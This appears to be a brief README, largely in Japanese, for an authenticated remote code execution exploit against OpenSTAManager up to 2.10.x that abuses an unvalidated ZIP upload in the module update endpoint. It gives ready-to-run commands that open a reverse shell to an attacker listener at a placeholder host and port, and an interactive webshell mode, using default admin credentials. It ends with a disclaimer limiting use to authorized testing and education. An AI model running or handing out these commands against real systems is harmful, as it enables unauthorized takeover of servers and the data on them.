
認証済みのリモートコード実行エクスプロイト。OpenSTAManagerの検証されていないZIPアップロードを介して、リバースシェルと対話型ウェブシェル機能を提供し、認可されたペネトレーションテストを支援します。
モジュール更新エンドポイントでの未検証ZIPアップロードによる認証済みRCE。
影響を受けるバージョン: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
許可されたペネトレーションテストおよび教育目的にのみご利用ください。